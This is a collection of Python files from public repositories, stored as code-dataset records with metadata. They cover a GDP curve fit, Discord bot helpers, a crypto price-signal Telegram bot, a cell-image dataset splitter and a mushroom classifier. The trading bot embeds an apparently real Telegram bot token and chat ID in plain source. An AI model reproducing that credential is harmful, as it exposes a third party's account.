label='data')\nplt.plot(x,y, linewidth=3.0, label='fit')\nplt.legend(loc='best')\nplt.ylabel('GDP')\nplt.xlabel('Year')\nplt.show() \"\"\"\n\nmsk = np.random.rand(len(df)) < 0.8\ntrain_x = xdata[msk]\ntest_x = xdata[~msk]\ntrain_y = ydata[msk]\ntest_y = ydata[~msk]\n\n# MODEL TRAIN USING THE BEST FIT PARAMETERS\npopt, pcov = curve_fit(sigmoid, train_x, train_y)\n\n# PREDICITION OF TEST SET\ny_predict = sigmoid(test_x, *popt)\n\n# ACCURACY\nprint(\"Mean absolute error: %.2f\" % np.mean(np.absolute(y_predict - test_y)))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((y_predict - test_y) ** 2))\nfrom sklearn.metrics import r2_score\nprint(\"R2-score: %.2f\" % r2_score(y_predict , test_y) )\n\n# y_predict = sigmoid([2020], *popt)\n# print(y_predict * max(y_data))\n\n\n", "repo_name": "Premjxt-07/China-s-GDP-Analysis", "sub_path": "analysingchinagdp.py", "file_name": "analysingchinagdp.py", "file_ext": "py", "file_size_in_byte": 2724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 43, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 85, "usage_type": "attribute"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 101, "usage_type": "call"}]} +{"seq_id": "71734538753", "text": "import json\nimport sys\nfrom dataclasses import dataclass\nfrom enum import EnumMeta, auto\nfrom logging import DEBUG, Formatter, Logger, StreamHandler, getLogger\nfrom pathlib import Path\nfrom typing import Any, Literal, Optional, TypedDict\n\nfrom discord.ext.commands import Bot\nfrom strenum import LowercaseStrEnum, StrEnum\n\nPlayer = TypedDict(\n \"Player\",\n {\n \"#\": int,\n \"name\": str,\n \"mmr\": int,\n \"win\": int,\n \"loss\": int,\n \"rbucks\": int,\n \"rating\": int,\n \"adjusted_mmr\": int,\n \"%\": float,\n \"commends\": int,\n \"reports\": int,\n \"behaviour\": int,\n },\n)\nTeam = tuple[Player, Player, Player, Player, Player]\nTeamCombination = tuple[Team, Team]\n\n# We need a globally accessible reference to the bot instance for event handlers that require Cog functionality.\nbot: Optional[Bot] = None\n\nROOT_DIR: Path = Path(__file__).resolve().parent.parent\n\n\nclass EnumeratorMeta(EnumMeta):\n def __contains__(cls, member: Any) -> bool:\n if type(member) == cls:\n return EnumMeta.__contains__(cls, member)\n else:\n try:\n cls(member)\n except ValueError:\n return False\n return True\n\n\nclass Roles(StrEnum):\n ADMIN: Literal[\"IHL Admin\"] = \"IHL Admin\"\n MEMBER: Literal[\"IHL\"] = \"IHL\"\n\n\nclass Side(LowercaseStrEnum, metaclass=EnumeratorMeta):\n RADIANT = auto()\n DIRE = auto()\n\n\n@dataclass\nclass PlayerTransfer:\n buyer: str\n amount: int\n\n\n@dataclass\nclass Bet:\n side: str\n stake: int\n player: str\n\n\nclass OneHeadException(BaseException):\n pass\n\n\ndef get_bot_instance() -> Bot:\n if bot is None:\n raise OneHeadException(\"Global bot instance is None\")\n\n return bot\n\n\ndef set_bot_instance(new_bot_instance: Bot) -> None:\n global bot\n bot = new_bot_instance\n\n\ndef get_player_names(t1: \"Team\", t2: \"Team\") -> tuple[tuple[str, ...], tuple[str, ...]]:\n \"\"\"\n Obtain player names from player profiles.\n\n :param t1: Player Profiles for Team 1.\n :param t2: Player Profiles for Team 2.\n :return: Names of players on each team.\n \"\"\"\n\n t1_names: tuple[str, ...] = tuple(sorted([x[\"name\"] for x in t1]))\n t2_names: tuple[str, ...] = tuple(sorted([x[\"name\"] for x in t2]))\n\n return t1_names, t2_names\n\n\ndef load_config() -> dict:\n try:\n config_path: Path = Path(ROOT_DIR, \"secrets/config.json\")\n with open(str(config_path), \"r\") as f:\n config: dict = json.load(f)\n except IOError as e:\n raise OneHeadException(e)\n\n return config\n\n\ndef update_config(updated_config: dict) -> None:\n try:\n config_path: Path = Path(ROOT_DIR, \"secrets/config.json\")\n with open(str(config_path), \"w\") as f:\n json.dump(updated_config, f)\n except IOError as e:\n raise OneHeadException(e)\n\n\ndef set_logger() -> Logger:\n handler: StreamHandler = StreamHandler(stream=sys.stdout)\n formatter: Formatter = Formatter(fmt=\"%(asctime)s %(levelname)-8s %(message)s\", datefmt=\"%Y-%m-%d %H:%M:%S\")\n handler.setFormatter(formatter)\n log: Logger = getLogger(\"onehead\")\n log.setLevel(DEBUG)\n log.addHandler(handler)\n return log\n\n\nlog: Logger = set_logger()\n\n\ndef get_logger() -> Logger:\n return log\n", "repo_name": "belmegatron/OneHead", "sub_path": "onehead/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 3275, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.TypedDict", "line_number": 12, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 33, "usage_type": "name"}, {"api_name": "discord.ext.commands.Bot", "line_number": 33, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 35, "usage_type": "name"}, {"api_name": "enum.EnumMeta", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 39, "usage_type": "name"}, {"api_name": "enum.EnumMeta.__contains__", "line_number": 41, "usage_type": "call"}, {"api_name": "enum.EnumMeta", "line_number": 41, "usage_type": "name"}, {"api_name": "strenum.StrEnum", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 52, "usage_type": "name"}, {"api_name": "strenum.LowercaseStrEnum", "line_number": 55, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 56, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 57, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 60, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 66, "usage_type": "name"}, {"api_name": "discord.ext.commands.Bot", "line_number": 77, "usage_type": "name"}, {"api_name": "discord.ext.commands.Bot", "line_number": 84, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 106, "usage_type": "name"}, {"api_name": "json.load", "line_number": 108, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 117, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 119, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 125, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 125, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 126, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 128, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 129, "usage_type": "argument"}, {"api_name": "logging.Logger", "line_number": 124, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 134, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 137, "usage_type": "name"}]} +{"seq_id": "39005103873", "text": "import requests\nimport json\nimport datetime\nimport time\nimport telegram\nimport pytz\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import load_model\n\ndef get_csv(symbol, start_date,end_date, res):\n\n start_date_stamp = int(time.mktime(datetime.datetime.strptime(start_date,'%Y-%m-%d').timetuple()))\n end_date_stamp = int(time.mktime(datetime.datetime.strptime(f'{end_date} 23:59','%Y-%m-%d %H:%M').timetuple()))\n\n url = f\"https://api.nobitex.ir/market/udf/history?symbol={symbol}&resolution={res}&from={start_date_stamp}&to={end_date_stamp}\"\n\n payload={}\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n res = response.text\n y = json.loads(res)\n df = pd.DataFrame({'Date':y['t'][::-1],'Close':y['c'][::-1], 'Open':y['o'], 'High':y['h'], 'Low':y['o']})\n df['Date'] = df['Date'].apply(lambda x: datetime.datetime.fromtimestamp(x, tz=pytz.timezone('Asia/Tehran')))\n return df\n\ndef get_csv_datetime(symbol, start_date,end_date, res):\n\n start_date_stamp = int(datetime.datetime.timestamp(start_date) )\n end_date_stamp = int(datetime.datetime.timestamp(end_date))\n\n url = f\"https://api.nobitex.ir/market/udf/history?symbol={symbol}&resolution={res}&from={start_date_stamp}&to={end_date_stamp}\"\n payload={}\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n res = response.text\n y = json.loads(res)\n df = pd.DataFrame({'Date':y['t'][::-1],'Close':y['c'][::-1], 'Open':y['o'], 'High':y['h'], 'Low':y['o']})\n df['Date'] = df['Date'].apply(lambda x: datetime.datetime.fromtimestamp(x, tz=pytz.timezone('Asia/Tehran')))\n return df\n\n\ndef window_dataframe(df, start_date,end_date,num_of_features):\n \n #windowed_df = df[ (start_date <= df['Date']) & (df['Date'] <= end_date)]\n windowed_df = df[['Date','Close']]\n windowed_df = windowed_df.rename({'Close':'target'}, axis=1)\n\n for n in range(num_of_features):\n feature = []\n for index in range(len(windowed_df)):\n if index + num_of_features >= len(windowed_df):\n feature.append(0)\n else:\n feature.append(windowed_df.loc[index+n+1].target)\n windowed_df[f'target-{n+1}'] = feature\n\n windowed_df.drop(windowed_df.tail(num_of_features).index, inplace=True)\n return windowed_df\n\ndef windowed_df_to_date_X_y(windowed_df):\n \n windowed_df = windowed_df.sort_values(by='Date')\n\n df_as_np = windowed_df.to_numpy()\n\n dates = df_as_np[:,0]\n\n X = df_as_np[:,2:]\n\n X = X.reshape((len(dates), X.shape[1],1))\n\n Y = df_as_np[:,1]\n\n return dates, X.astype(np.float32), Y.astype(np.float32)\n\n\n\n\ncryptoes = [\n {'symbol':'TRXIRT'},\n {'symbol':'ADAIRT'},\n {'symbol':'LINKIRT'},\n {'symbol':'EOSIRT'},\n {'symbol':'ETHIRT'},\n {'symbol':'XRPIRT'},\n {'symbol':'DOTIRT'},\n {'symbol':'UNIIRT'},\n {'symbol':'SANDIRT'}\n]\n\n\n\nTELEGRAM_BOT_TOKEN = '5474558689:AAEqdTKZdqLdw10P7BZhlo9lTN89AxJLQv4'\nTELEGRAM_CHAT_ID = '-1001639881360'\n\nbot = telegram.Bot(token=TELEGRAM_BOT_TOKEN)\n\n\n\n\nfor crypto in cryptoes:\n model = load_model(f'models/{crypto[\"symbol\"]}.h5')\n crypto['model'] = model\n\n\n\n# get the start time\nstart_time = datetime.datetime.now(tz=pytz.timezone('Asia/Tehran'))\nstart_time = start_time - datetime.timedelta(hours=1,minutes=30)\n\nDAYS_TO_RUN = 1\n## Consider that we are running this for a day.\nend_time = start_time + datetime.timedelta(days = DAYS_TO_RUN+1)\n\ntimes = 0\n\n\n\nstart_date = '2022-07-27'\nend_date = '2022-08-12'\nfor index, crypto in enumerate(cryptoes):\n m_df = get_csv(crypto['symbol'], start_date, end_date,'60')\n crypto['min'] = m_df.Close.min()\n crypto['max'] = m_df.Close.max()\n print(f'{crypto[\"symbol\"]} : {crypto[\"min\"]} - {crypto[\"max\"]}')\n\n \n\n\nwhile(datetime.datetime.now(tz=pytz.timezone('Asia/Tehran')) < end_time):\n for index, crypto in enumerate(cryptoes):\n #for crypto in cryptoes:\n symbol = crypto['symbol']\n print(symbol)\n ## Getting the data\n now_time = datetime.datetime.now(tz=pytz.timezone('Asia/Tehran'))\n if times == 0:\n new_df = get_csv_datetime(symbol,start_time, now_time ,'5')\n else:\n new_df = get_csv_datetime(symbol,now_time - datetime.timedelta(minutes=11), now_time ,'5')\n # Normalizing the data\n new_df['Date'] = pd.to_datetime(new_df['Date'])\n new_df['Close'] = new_df['Close'].apply(lambda x: str(x).replace(',',''))\n new_df['Close'] = pd.to_numeric(new_df['Close'],errors='coerce')\n min = crypto['min']\n max = crypto['max']\n new_df.Close = (new_df.Close - min) / (max - min)\n\n if len(new_df) < 4:\n\n crypto['df'].loc[-1] = new_df.loc[0]\n crypto['df'].index = crypto['df'].index + 1\n crypto['df'] = crypto['df'].sort_index()\n else:\n crypto['df'] = new_df\n print(new_df)\n ## Windowing the df\n windowed_df = window_dataframe(crypto['df'],'1999-1-1','2090-1-1',4)\n dates, X,y = windowed_df_to_date_X_y(windowed_df)\n crypto['dates'] = dates\n crypto['X'] = X\n crypto['y'] = y\n\n \n fig = plt.figure(figsize=(26,12))\n fig.suptitle(f'{now_time.hour}:{now_time.minute}')\n axes = fig.subplots(nrows=3,ncols=3)\n for index, crypto in enumerate(cryptoes):\n ax = axes[int(index/3)][index%3]\n y_preds = crypto['model'].predict(crypto['X']).flatten()\n idx = np.argwhere(np.diff(np.sign(crypto['y'] - y_preds))).flatten()\n #idx = list(map(lambda x:x+1, idx))\n ax.set_title(crypto['symbol'])\n\n min = crypto['min']\n max = crypto['max']\n \n signals = []\n for id in idx:\n price = crypto['y'][id] * (max-min) + min\n time_str = f'{crypto[\"dates\"][id].hour}:{crypto[\"dates\"][id].minute}' \n if id+1 < len(crypto['y']):\n if crypto['y'][id] < y_preds[id]:\n signals.append({'type':'sell','time':time_str, 'price':price,'idx':id})\n elif crypto['y'][id] > y_preds[id]:\n signals.append({'type':'buy','time':time_str, 'price':price,'idx':id})\n else:\n if crypto['y'][id] < crypto['y'][id+1]:\n signals.append({'type':'sell','time':time_str, 'price':price,'idx':id})\n elif crypto['y'][id] > crypto['y'][id+1]:\n signals.append({'type':'buy','time':time_str, 'price':price, 'idx':id})\n \n if times == 0:\n crypto['signals'] = signals\n message = f'lost signals {crypto[\"symbol\"]}: {signals}' \n print(message)\n bot.send_message(chat_id=TELEGRAM_CHAT_ID, text=message)\n else:\n len_new = len(signals) - len(crypto['signals'])\n if len_new > 0:\n new_signals = signals[(-1) * len_new:]\n for signal in new_signals:\n signal['time'] = f'{crypto[\"dates\"][-1].hour}:{crypto[\"dates\"][-1].minute}' \n signal['price'] = crypto['y'][-1] * (max-min) + min\n message = f'new signals {crypto[\"symbol\"]}: {new_signals}'\n print(message)\n ##TODO:: send message telegram\n bot.send_message(chat_id=TELEGRAM_CHAT_ID, text=message)\n crypto['signals'] = signals\n \n\n ax.plot(crypto['dates'], y_preds)\n\n ax.plot(crypto['dates'],crypto['y'])\n sells = [signal['idx']+1 for signal in list(filter(lambda x:x['type'] == 'sell', signals))]\n buys = [signal['idx']+1 for signal in list(filter(lambda x:x['type'] == 'buy', signals))]\n\n ax.plot(dates[sells], crypto['y'][sells], 'ro' )\n ax.plot(dates[buys], crypto['y'][buys], 'go' )\n ax.legend(['Predicted Price','Actual Price','Sell Points','Buy Points'])\n \n fig.savefig('chart-5.jpg')\n bot.send_photo(chat_id=TELEGRAM_CHAT_ID, photo=open('chart-5.jpg', 'rb'))\n\n times+=1\n plt.show()\n print('----------------------------------------------------------------------------------------------------------------------------------------------')\n for crypto in cryptoes:\n print(f'signals {crypto[\"symbol\"]}: {crypto[\"signals\"]}')\n time.sleep(300)\n\n\n\n", "repo_name": "shervindadashzade/Trader-bot", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 7875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "time.mktime", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "attribute"}, {"api_name": "time.mktime", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "requests.request", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime.timestamp", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "attribute"}, {"api_name": "datetime.datetime.timestamp", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "attribute"}, {"api_name": "requests.request", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 80, "usage_type": "attribute"}, {"api_name": "telegram.Bot", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 119, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 142, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 146, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 148, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "numpy.argwhere", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 236, "usage_type": "call"}]} +{"seq_id": "26207603657", "text": "from upath import UPath as Path\nimport logging\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport nbvv\nimport os\nimport warnings\nfrom aicsimageio import transforms, AICSImage\nfrom aicsimageprocessing import diagnostic_sheet, read_ome_zarr, rescale_image, imgtoprojection\n\nfrom serotiny.io.image import image_loader\nfrom cytodata_aics.io_utils import rescale_image\n\nlogging.getLogger(\"bfio\").setLevel(logging.ERROR)\nlogging.getLogger(\"bfio.backends\").setLevel(logging.ERROR)\nlogging.getLogger(\"aicsimageio\").setLevel(logging.ERROR)\n\n\n\n#From Chapter 5\n#loading library, making path for \ndef split_dataframe_(\n dataframe,\n train_frac,\n val_frac,\n seed,\n return_splits = True\n):\n \"\"\"Given a pandas dataframe, perform a train-val-test split and either return three\n different dataframes, or append a column identifying the split each row belongs to.\n TODO: extend this to enable balanced / stratified splitting\n Parameters\n ----------\n dataframe: pd.DataFrame\n Input dataframe\n train_frac: float\n Fraction of data to use for training. Must be <= 1\n val_frac: Optional[float]\n Fraction of data to use for validation. By default,\n the data not used for training is split in half\n between validation and test\n return_splits: bool = True\n Whether to return the three splits separately, or to append\n a column to the existing dataframe and return the modified\n dataframe\n \"\"\"\n\n # import here to optimize CLIs / Fire usage\n from sklearn.model_selection import train_test_split\n\n train_ix, val_test_ix = train_test_split(\n dataframe.index.tolist(), train_size=train_frac\n )\n if val_frac is not None:\n val_frac = val_frac / (1 - train_frac)\n else:\n # by default use same size for val and test\n val_frac = 0.5\n\n val_ix, test_ix = train_test_split(val_test_ix, train_size=val_frac, random_state=seed)\n\n if return_splits:\n return dict(\n train=dataframe.loc[train_ix],\n valid=dataframe.loc[val_ix],\n test=dataframe.loc[test_ix],\n )\n\n dataframe.loc[train_ix, \"split\"] = \"train\"\n dataframe.loc[val_ix, \"split\"] = \"valid\"\n dataframe.loc[test_ix, \"split\"] = \"test\"\n\n return dataframe\n\ndef split_dataframe_with_seed(df, train_frac, val_frac, seed):\n Path(\"/home/aicsuser/serotiny_data/\").mkdir(parents=True, exist_ok=True)\n \n # Sample n cells per group\n n = 2000 # number of cells per mitotic class\n cells_to_include=[]\n for name, group in df.groupby('cell_stage'): \n sampled_group = group.sample(min([n,len(group)]))\n cells_to_include.append(sampled_group)\n df_mitocells = pd.concat(cells_to_include).reset_index(drop=True)\n\n # Discarding all the M6M7_single cells\n df_mitocells = df_mitocells.drop(df_mitocells[df_mitocells['cell_stage']=='M6M7_single'].index)\n\n # Add the train, test and validate split\n df_mitocells = split_dataframe_(dataframe=df_mitocells, train_frac=train_frac, val_frac=val_frac, return_splits=False, seed=seed)\n\n # df_mitocells.to_csv(\"/home/aicsuser/serotiny_data/mitocells.csv\") \n print(f\"Number of cells: {len(df_mitocells)}\")\n print(f\"Number of columns: {len(df_mitocells.columns)}\")\n\n return df_mitocells\n\n\ndef generate_dataset(train_frac=0.7, val_frac=0.2, seed=42):\n df = pd.read_parquet(\"s3://allencell-hipsc-cytodata/hackathon_manifest_17oct2022.parquet\")\n print(f'Number of cells: {len(df)}')\n print(f'Number of columns: {len(df.columns)}')\n data_frame = split_dataframe_with_seed(df, train_frac=0.7, val_frac=0.2, seed=42)\n\n # M0 2000\n # M1M2 2000\n # M4M5 2000\n # M6M7_complete 1198\n # M3 981\n\n CLASS_DICT = {\n \"M0\": 0,\n \"M1M2\": 1,\n \"M3\": 2,\n \"M4M5\": 3,\n \"M6M7_complete\": 4,\n }\n data_frame['cell_stage_code'] = data_frame['cell_stage'].map(CLASS_DICT)\n print(data_frame['cell_stage_code'].value_counts())\n return data_frame\n", "repo_name": "pedrofale/cytodata-hackathon-base", "sub_path": "cytodata_aics/split_dataset.py", "file_name": "split_dataset.py", "file_ext": "py", "file_size_in_byte": 4096, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 18, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 63, "usage_type": "call"}, {"api_name": "upath.UPath", "line_number": 79, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 87, "usage_type": "call"}, {"api_name": "pandas.read_parquet", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "12636865764", "text": "import streamlit as st\nimport cv2\nimport numpy as np\nfrom yolo_predictions import YOLO_Pred\n\nyolo = YOLO_Pred('my_obj.onnx','my_obj.yaml')\nname = ['Agaricus',\n 'Amanita',\n 'Boletus',\n 'Cortinarius',\n 'Entoloma',\n 'Exidia',\n 'Hygrocybe',\n 'Inocybe',\n 'Lactarius',\n 'Pluteus',\n 'Russula',\n 'Suillus']\n\nst.title(\"การจำแนกชนิดของเห็ด : ภาพนิ่ง\")\nimg_file = st.file_uploader(\"โหลดไฟล์ภาพ\")\n\nif img_file is not None: \n file_bytes = np.asarray(bytearray(img_file.read()), dtype=np.uint8)\n img = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)\n #----------------------------------------------\n pred_image, obj_box = yolo.predictions(img)\n \n if len(obj_box) > 0:\n b = []\n da =[]\n obj_names = ''\n for i in obj_box:\n b.append(i[4])\n for k in b:\n for j in name:\n if k==j:\n da.append(j)\n name.remove(j)\n for p in range(len(da)):\n obj_names = obj_names + da[p] + ' '\n text_obj = 'เห็ดที่ตรวจพบ : ' + obj_names\n else:\n text_obj = 'ไม่พบชนิดของเห็ด'\n #----------------------------------------------\n st.header(text_obj)\n st.image(pred_image, caption='ภาพ Output',channels=\"BGR\")\n \n", "repo_name": "jaroonsi62/YOLO_wed_app", "sub_path": "app1.py", "file_name": "app1.py", "file_ext": "py", "file_size_in_byte": 1453, "program_lang": "python", "lang": "th", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "yolo_predictions.YOLO_Pred", "line_number": 6, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 25, "usage_type": "attribute"}, {"api_name": "streamlit.header", "line_number": 46, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "28098947973", "text": "#!/usr/bin/python3\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as fm\nfrom matplotlib import rcParams\nfrom collections import defaultdict\nfrom util_patterns import *\nfrom util_dataparse_throughput import *\nimport glob\nrcParams.update(params_line)\n\ndx = 0/72.; dy = -15/72. \noffset = matplotlib.transforms.ScaledTranslation(dx, dy, plt.gcf().dpi_scale_trans)\n\nall_tasks = [\"AC-DPI\", \"Hyperscan-DPI\", \"SmartNIC-DPI\"]\nall_ipsecs = [\"no_ipsec\", \"gcm_ipsec\", \"sha_ipsec\"]\nall_traces = [\"ICTF\", \"64B\", \"256B\", \"512B\", \"1KB\"]\nall_traces_pktsize = [\"64B\", \"256B\", \"512B\", \"1KB\"]\nall_cores = [\"1\", \"2\", \"4\", \"8\", \"16\"]\nall_rules = [\"1k\", \"5k\", \"10k\", \"20k\", \"30k\", \"33.5k\"]\n\ndef get_task(ori_name):\n switcher = {\n **dict.fromkeys([\"dpi\", \"dpi-ipsec\", \"dpi-ipsec-sha\"], \"AC-DPI\"), \n **dict.fromkeys([\"dpi-hs\", \"dpi-hs-ipsec\", \"dpi-hs-ipsec-sha\"], \"Hyperscan-DPI\"), \n **dict.fromkeys([\"hfa-se-maxperf-check\", \"hfa-se-maxperf-ipsec-check\", \"hfa-se-maxperf-ipsec-check-sha\"], \"SmartNIC-DPI\"), \n }\n return switcher.get(ori_name, \"Invalid task name %s\" % (ori_name,))\n\ndef get_ipsec(ori_name):\n no_ipsec_names = [\"firewall\", \"acl-fw\", \"hfa-se-maxperf-check\", \"dpi\", \"nat\", \"nat-tcp-v4\", \"maglev\", \"lpm\", \"monitor\", \"monitoring\", \"dpi-hs\"]\n gcm_ipsec_names = [\"firewall-ipsec\", \"acl-fw-ipsec\", \"hfa-se-maxperf-ipsec-check\", \"dpi-ipsec\", \"nat-ipsec\", \"nat-tcp-v4-ipsec\", \"maglev-ipsec\", \"lpm-ipsec\", \"monitor-ipsec\", \"monitoring-ipsec\", \"dpi-hs-ipsec\"]\n sha_ipsec_names = [\"firewall-ipsec-sha\", \"acl-fw-ipsec-sha\", \"hfa-se-maxperf-ipsec-check-sha\", \"dpi-ipsec-sha\", \"nat-ipsec-sha\", \"nat-tcp-v4-ipsec-sha\", \"maglev-ipsec-sha\", \"lpm-ipsec-sha\", \"monitor-ipsec-sha\", \"monitoring-ipsec-sha\", \"dpi-hs-ipsec-sha\"]\n \n switcher = {\n **dict.fromkeys(no_ipsec_names, \"no_ipsec\"), \n **dict.fromkeys(gcm_ipsec_names, \"gcm_ipsec\"),\n **dict.fromkeys(sha_ipsec_names, \"sha_ipsec\")\n }\n return switcher.get(ori_name, \"Invalid task name %s\" % (ori_name,))\n\ndef get_trace(ori_name):\n switcher = {\n **dict.fromkeys([\"ICTF\", \"ICTF_ACL\", \"ICTF_IPSEC\", \"ICTF_IPSEC_ACL\", \"ICTF_IPSEC_SHA\", \"ICTF_IPSEC_ACL_SHA\"], \"ICTF\"), \n **dict.fromkeys([\"CAIDA64\", \"CAIDA64_ACL\", \"CAIDA64_IPSEC\", \"CAIDA64_IPSEC_ACL\", \"CAIDA64_IPSEC_SHA\", \"CAIDA64_IPSEC_ACL_SHA\"], \"64B\"), \n **dict.fromkeys([\"CAIDA256\", \"CAIDA256_ACL\", \"CAIDA256_IPSEC\", \"CAIDA256_IPSEC_ACL\", \"CAIDA256_IPSEC_SHA\", \"CAIDA256_IPSEC_ACL_SHA\"], \"256B\"), \n **dict.fromkeys([\"CAIDA512\", \"CAIDA512_ACL\", \"CAIDA512_IPSEC\", \"CAIDA512_IPSEC_ACL\", \"CAIDA512_IPSEC_SHA\", \"CAIDA512_IPSEC_ACL_SHA\"], \"512B\"), \n **dict.fromkeys([\"CAIDA1024\", \"CAIDA1024_ACL\", \"CAIDA1024_IPSEC\", \"CAIDA1024_IPSEC_ACL\", 